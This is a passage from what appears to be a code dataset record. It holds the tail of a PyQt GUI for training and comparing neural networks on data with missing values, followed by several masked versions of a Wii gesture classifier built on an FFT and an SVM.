trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n\n ############## new cnn result show ######\n resultShowModule = QVBoxLayout()\n\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n\n ################# new algorithm ui ##########\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(dataModule)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(trainingModule)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(resultShowModule)\n\n hboxTop.addStretch(1)\n\n #########traditional data module##########\n dataModuleT = QVBoxLayout()\n\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n\n ###### training module ########\n trainingModuleT = QVBoxLayout()\n\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n\n ############## traditional nn result show ######\n resultShowModuleT = 
QVBoxLayout()\n\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n\n ####### traditional algorithm #########\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(dataModuleT)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(trainingModuleT)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(resultShowModuleT)\n\n hboxBottom.addStretch(1)\n\n ########## whole frame layout ########\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet(\"QWidget { background-color: %s }\" % col.name())\n splitterLine.resize(splitterLine.sizeHint())\n\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n # vbox.addWidget(QLabel(str('_'*int(self.width()/3))))\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n\n self.setCentralWidget(mainWidget)\n\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n\n############ data load module #####################\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')\n if ok:\n # dataname = self.fname['New'].split('/')[-1].split('.')[0]\n # # print(dataname)\n # self.presentDataName.setText(dataname)\n # self.presentDataName.resize(self.presentDataName.sizeHint())\n self.loadData()\n\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')\n if ok:\n # dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n # # print(dataname)\n # self.presentDataNameT.setText(dataname)\n # self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n self.loadData()\n\n return\n\n\n def loadData(self):\n if self.sender() is 
self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'], self.dataLossRate['New'], self.dataSetLossValue['New'])\n # print(self.dataFor['New'].DataTrainX, '\\n', self.dataFor['New'].DataTrainY)\n\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message', \"Data file not exist\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n except Exception:\n reply = QMessageBox.information(self, 'Message', \"Data file format error\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n # print(dataname)\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'], self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n # print(self.dataFor['Tra'].DataTrainX, '\\n', self.dataFor['Tra'].DataTrainY)\n\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message', \"Data file not exist\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n except Exception:\n reply = QMessageBox.information(self, 'Message', \"Data file format error\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n # print(dataname)\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog('combine-CNN设置缺失参数', self, 'New')\n\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog('traditional NN设置缺失参数', self, 'Tra')\n\n # print(self.dataLossRate)\n # print(self.dataSetLossValue)\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n # print(1)\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示', self, 'New')\n\n elif self.sender() is self.dataShowButtonT:\n # print(1)\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message', 'PreProcess succeed!',\n QMessageBox.Yes, QMessageBox.Yes)\n\n return\n\n ############## training module #################\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n # print(1)\n self.setModelParaW = setModelParametersDialog.setLossParameterDialog('combine-CNN模型参数设置', self, 'New')\n\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = setModelParametersDialog.setLossParameterDialog('traditional NN模型参数设置', self, 'Tra')\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n # print(self.trainingW)\n self.trainingW.show()\n return\n senderName = 'New'\n\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n\n senderName = 'Tra'\n\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n elif senderName == 'New':\n if 
self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误', '卷积层组合(卷积核)大小大于数据集特征数量',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1], self.combineNumConv)\\\n < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误', '池化层组合(池化核)大小大于卷积层输出特征向量维度',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n # print(self.trainingW)\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示', 'traditional NN训练正在进行,请等待其结束',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练', self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示', 'combine-CNN训练正在进行,请等待其结束',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果', '模型保存成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果', '模型保存成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv, self.convCoreNum, self.combineNumPooling)\n\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n\n succeed = self.trann.setModel(fname)\n if 
succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n return\n\n def showResult(self):\n\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.showResultW = showResultWidget.ShowResultWidget('combine-CNN预测结果展示', self, 'New')\n\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.showResultW = showResultWidget.ShowResultWidget('traditional NN预测结果展示', self, 'Tra')\n\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',\n self, 'New')\n\n elif self.sender() is self.judgeResultButtonT:\n\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',\n self, 'Tra')\n # self.testw = showJudgeWidgets.judgeWidget('test', self, 'New', 'Train')\n # self.mcbcnn.runCNN('Test', self.dataFor['New'])\n # drawCM = Judgement.myJudge(self.mcbcnn.data.yClassDic, self.mcbcnn.getAccuratePredictResult().argmax(1), self.mcbcnn.data.DataTestY.argmax(1))\n # drawCM.plotConfuseMatrix()\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myMainWindow = MyMainWindow()\n sys.exit(app.exec_())",
"step-ids": [
9,
11,
12,
15,
18
]
}
|
[
9,
11,
12,
15,
18
] |
<|reserved_special_token_0|>
class WiiGestureClassifier:
<|reserved_special_token_0|>
def __init__(self):
super(self.__class__, self).__init__()
<|reserved_special_token_0|>
def parseArrays(self, data):
parsedData = []
for gesture in data:
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture
.trainingsData]
parsedGesture.trainingsData = parsedData
self.parsedGestureList.append(parsedGesture)
<|reserved_special_token_0|>
def calcMinLength(self):
all = []
for gesture in self.parsedGestureList:
all += gesture.trainingsData
minlen = min([len(x) for x in all])
return minlen
def cutGestureList(self):
for gesture in self.parsedGestureList:
gesture.trainingsData = [l[:self.minlen] for l in gesture.
trainingsData]
<|reserved_special_token_0|>
def buildClassifier(self):
self.c = svm.SVC()
count = 0
categories = []
trainingData = []
for gesture in self.parsedGestureList:
categories += [count] * len(gesture.frequencies)
trainingData += gesture.frequencies
count += 1
try:
self.c.fit(trainingData, categories)
except ValueError:
            return 'More training data for some gestures required'
def classify(self, gesture):
parsedData = []
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture.
trainingsData]
parsedGesture.trainingsData = parsedData
if len(parsedGesture.trainingsData[0]) < self.minlen:
missingValues = self.minlen - len(parsedGesture.trainingsData[0])
for x in range(missingValues):
parsedGesture.trainingsData[0].append(0)
parsedGesture.trainingsData = [l[:self.minlen] for l in
parsedGesture.trainingsData]
        parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) // 2]
            for l in parsedGesture.trainingsData]
        return self.c.predict([parsedGesture.frequencies[0]])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WiiGestureClassifier:
<|reserved_special_token_0|>
def __init__(self):
super(self.__class__, self).__init__()
<|reserved_special_token_0|>
def parseArrays(self, data):
parsedData = []
for gesture in data:
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture
.trainingsData]
parsedGesture.trainingsData = parsedData
self.parsedGestureList.append(parsedGesture)
<|reserved_special_token_0|>
def calcMinLength(self):
all = []
for gesture in self.parsedGestureList:
all += gesture.trainingsData
minlen = min([len(x) for x in all])
return minlen
def cutGestureList(self):
for gesture in self.parsedGestureList:
gesture.trainingsData = [l[:self.minlen] for l in gesture.
trainingsData]
<|reserved_special_token_0|>
def buildClassifier(self):
self.c = svm.SVC()
count = 0
categories = []
trainingData = []
for gesture in self.parsedGestureList:
categories += [count] * len(gesture.frequencies)
trainingData += gesture.frequencies
count += 1
try:
self.c.fit(trainingData, categories)
except ValueError:
            return 'More training data for some gestures required'
def classify(self, gesture):
parsedData = []
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture.
trainingsData]
parsedGesture.trainingsData = parsedData
if len(parsedGesture.trainingsData[0]) < self.minlen:
missingValues = self.minlen - len(parsedGesture.trainingsData[0])
for x in range(missingValues):
parsedGesture.trainingsData[0].append(0)
parsedGesture.trainingsData = [l[:self.minlen] for l in
parsedGesture.trainingsData]
        parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) // 2]
            for l in parsedGesture.trainingsData]
        return self.c.predict([parsedGesture.frequencies[0]])
def checkListForEmpty(self):
if len(self.parsedGestureList) <= 0:
return True
        for gesture in self.parsedGestureList:
            if len(gesture.trainingsData) <= 0:
                return True
        return False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WiiGestureClassifier:
<|reserved_special_token_0|>
def __init__(self):
super(self.__class__, self).__init__()
def train(self, gestureList):
self.gestureList = gestureList
self.parsedGestureList = []
self.parseArrays(self.gestureList)
if self.checkListForEmpty():
return '\na gesture has no trained samples'
self.minlen = self.calcMinLength()
self.cutGestureList()
self.getFrequencies()
self.buildClassifier()
def parseArrays(self, data):
parsedData = []
for gesture in data:
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture
.trainingsData]
parsedGesture.trainingsData = parsedData
self.parsedGestureList.append(parsedGesture)
<|reserved_special_token_0|>
def calcMinLength(self):
all = []
for gesture in self.parsedGestureList:
all += gesture.trainingsData
minlen = min([len(x) for x in all])
return minlen
def cutGestureList(self):
for gesture in self.parsedGestureList:
gesture.trainingsData = [l[:self.minlen] for l in gesture.
trainingsData]
def getFrequencies(self):
for gesture in self.parsedGestureList:
            gesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) // 2]
                for l in gesture.trainingsData]
def buildClassifier(self):
self.c = svm.SVC()
count = 0
categories = []
trainingData = []
for gesture in self.parsedGestureList:
categories += [count] * len(gesture.frequencies)
trainingData += gesture.frequencies
count += 1
try:
self.c.fit(trainingData, categories)
except ValueError:
            return 'More training data for some gestures required'
def classify(self, gesture):
parsedData = []
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture.
trainingsData]
parsedGesture.trainingsData = parsedData
if len(parsedGesture.trainingsData[0]) < self.minlen:
missingValues = self.minlen - len(parsedGesture.trainingsData[0])
for x in range(missingValues):
parsedGesture.trainingsData[0].append(0)
parsedGesture.trainingsData = [l[:self.minlen] for l in
parsedGesture.trainingsData]
        parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) // 2]
            for l in parsedGesture.trainingsData]
        return self.c.predict([parsedGesture.frequencies[0]])
def checkListForEmpty(self):
if len(self.parsedGestureList) <= 0:
return True
        for gesture in self.parsedGestureList:
            if len(gesture.trainingsData) <= 0:
                return True
        return False
<|reserved_special_token_1|>
import numpy as np
from scipy.fft import fft
import math
from sklearn import svm
from activity_recognition import WiiGesture
class WiiGestureClassifier:
"""
This class uses the FFT on the average of all three sensor values
to provide the training data for the SVM
    Three easily distinguishable gestures are:
Fast circle movement
Still, doing nothing
Fast swing movement from behind the shoulder (like a whip)
"""
def __init__(self):
super(self.__class__, self).__init__()
def train(self, gestureList):
self.gestureList = gestureList
self.parsedGestureList = []
self.parseArrays(self.gestureList)
if self.checkListForEmpty():
return '\na gesture has no trained samples'
self.minlen = self.calcMinLength()
self.cutGestureList()
self.getFrequencies()
self.buildClassifier()
def parseArrays(self, data):
parsedData = []
for gesture in data:
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture
.trainingsData]
parsedGesture.trainingsData = parsedData
self.parsedGestureList.append(parsedGesture)
def parseDataset(self, dataSet):
x = []
y = []
z = []
avg = []
for values in dataSet:
x.append(values[0] - 512)
y.append(values[1] - 512)
z.append(values[2] - 512)
avg.append((values[0] - 512 + values[1] - 512 + values[2] - 512
) / 3)
return avg
def calcMinLength(self):
all = []
for gesture in self.parsedGestureList:
all += gesture.trainingsData
minlen = min([len(x) for x in all])
return minlen
def cutGestureList(self):
for gesture in self.parsedGestureList:
gesture.trainingsData = [l[:self.minlen] for l in gesture.
trainingsData]
def getFrequencies(self):
for gesture in self.parsedGestureList:
            gesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) // 2]
                for l in gesture.trainingsData]
def buildClassifier(self):
self.c = svm.SVC()
count = 0
categories = []
trainingData = []
for gesture in self.parsedGestureList:
categories += [count] * len(gesture.frequencies)
trainingData += gesture.frequencies
count += 1
try:
self.c.fit(trainingData, categories)
except ValueError:
            return 'More training data for some gestures required'
def classify(self, gesture):
parsedData = []
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture.
trainingsData]
parsedGesture.trainingsData = parsedData
if len(parsedGesture.trainingsData[0]) < self.minlen:
missingValues = self.minlen - len(parsedGesture.trainingsData[0])
for x in range(missingValues):
parsedGesture.trainingsData[0].append(0)
parsedGesture.trainingsData = [l[:self.minlen] for l in
parsedGesture.trainingsData]
        parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) // 2]
            for l in parsedGesture.trainingsData]
        return self.c.predict([parsedGesture.frequencies[0]])
def checkListForEmpty(self):
if len(self.parsedGestureList) <= 0:
return True
        for gesture in self.parsedGestureList:
            if len(gesture.trainingsData) <= 0:
                return True
        return False
<|reserved_special_token_1|>
import numpy as np
from scipy.fft import fft
import math
from sklearn import svm
from activity_recognition import WiiGesture
class WiiGestureClassifier():
"""
This class uses the FFT on the average of all three sensor values
to provide the training data for the SVM
    Three easily distinguishable gestures are:
Fast circle movement
Still, doing nothing
Fast swing movement from behind the shoulder (like a whip)
"""
def __init__(self):
super(self.__class__, self).__init__()
def train(self, gestureList):
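        # Full pipeline: parse raw samples, trim every sample to a common
        # length, extract FFT magnitude features, then fit the SVM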
self.gestureList = gestureList
self.parsedGestureList = []
self.parseArrays(self.gestureList)
if self.checkListForEmpty():
return "\na gesture has no trained samples"
self.minlen = self.calcMinLength()
self.cutGestureList()
self.getFrequencies()
self.buildClassifier()
def parseArrays(self, data):
parsedData = []
for gesture in data:
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet)
for dataSet in gesture.trainingsData]
parsedGesture.trainingsData = parsedData
self.parsedGestureList.append(parsedGesture)
def parseDataset(self, dataSet):
x = []
y = []
z = []
avg = []
        # Use the difference from the sensor's default (resting) value of 512
for values in dataSet:
x.append(values[0]-512)
y.append(values[1]-512)
z.append(values[2]-512)
avg.append((values[0]-512 + values[1]-512 + values[2]-512) / 3)
return avg
def calcMinLength(self):
all = []
for gesture in self.parsedGestureList:
all += gesture.trainingsData
minlen = min([len(x) for x in all])
return minlen
def cutGestureList(self):
for gesture in self.parsedGestureList:
gesture.trainingsData = [l[:self.minlen] for l in gesture.trainingsData]
def getFrequencies(self):
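        # Feature vectors: magnitude spectrum of each sample, dropping the
        # DC bin and the mirrored upper half of the FFT output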
for gesture in self.parsedGestureList:
            gesture.frequencies = [
                np.abs(fft(l) / len(l))[1:len(l) // 2] for l in gesture.trainingsData]
def buildClassifier(self):
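        # Each gesture becomes one SVM class; its integer label is its
        # position in the trained gesture list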
self.c = svm.SVC()
count = 0
categories = []
trainingData = []
for gesture in self.parsedGestureList:
categories += [count] * len(gesture.frequencies)
trainingData += gesture.frequencies
count += 1
try:
self.c.fit(trainingData, categories)
except ValueError:
            return 'More training data for some gestures required'
def classify(self, gesture):
parsedData = []
parsedGesture = WiiGesture(gesture.name)
parsedData = [self.parseDataset(dataSet) for dataSet in gesture.trainingsData]
parsedGesture.trainingsData = parsedData
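        # Zero-pad a short probe, then trim, so its feature vector matches
        # the length the classifier was trained on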
if len(parsedGesture.trainingsData[0]) < self.minlen:
missingValues = self.minlen - len(parsedGesture.trainingsData[0])
for x in range(missingValues):
parsedGesture.trainingsData[0].append(0)
parsedGesture.trainingsData = [l[:self.minlen] for l in parsedGesture.trainingsData]
        parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) // 2] for l in parsedGesture.trainingsData]
        return self.c.predict([parsedGesture.frequencies[0]])
def checkListForEmpty(self):
        # True if no gestures were trained at all or if any gesture
        # has no recorded samples
        if len(self.parsedGestureList) <= 0:
            return True
        for gesture in self.parsedGestureList:
            if len(gesture.trainingsData) <= 0:
                return True
        return False
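# --- Usage sketch (added; not part of the original module) ---
# A minimal smoke test with synthetic accelerometer data. It assumes, as the
# parsing code above implies, that WiiGesture(name) exposes a trainingsData
# attribute holding recorded samples, each a list of raw (x, y, z) triples
# centred on the sensor's 512 resting value. make_samples is a hypothetical
# helper, not part of the original project.
if __name__ == '__main__':
    import random
    def make_samples(amplitude, n_samples=4, length=64):
        # One sample per recorded gesture execution: raw sensor triples
        return [[(512 + random.randint(-amplitude, amplitude),
                  512 + random.randint(-amplitude, amplitude),
                  512 + random.randint(-amplitude, amplitude))
                 for _ in range(length)] for _ in range(n_samples)]
    still = WiiGesture('still')
    still.trainingsData = make_samples(2)
    shake = WiiGesture('shake')
    shake.trainingsData = make_samples(200)
    classifier = WiiGestureClassifier()
    classifier.train([still, shake])
    probe = WiiGesture('probe')
    probe.trainingsData = make_samples(200, n_samples=1)
    # Prints the predicted category as a length-1 array: 0 = still,
    # 1 = shake, following the order of the list passed to train()
    print(classifier.classify(probe))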
|
flexible
|
{
"blob_id": "0b7bba826b82c3751c072395431e17bc1dc9bb90",
"index": 6037,
"step-1": "<mask token>\n\n\nclass WiiGestureClassifier:\n <mask token>\n\n def __init__(self):\n super(self.__class__, self).__init__()\n <mask token>\n\n def parseArrays(self, data):\n parsedData = []\n for gesture in data:\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture\n .trainingsData]\n parsedGesture.trainingsData = parsedData\n self.parsedGestureList.append(parsedGesture)\n <mask token>\n\n def calcMinLength(self):\n all = []\n for gesture in self.parsedGestureList:\n all += gesture.trainingsData\n minlen = min([len(x) for x in all])\n return minlen\n\n def cutGestureList(self):\n for gesture in self.parsedGestureList:\n gesture.trainingsData = [l[:self.minlen] for l in gesture.\n trainingsData]\n <mask token>\n\n def buildClassifier(self):\n self.c = svm.SVC()\n count = 0\n categories = []\n trainingData = []\n for gesture in self.parsedGestureList:\n categories += [count] * len(gesture.frequencies)\n trainingData += gesture.frequencies\n count += 1\n try:\n self.c.fit(trainingData, categories)\n except ValueError:\n return 'More traininsdata for some gestures required'\n\n def classify(self, 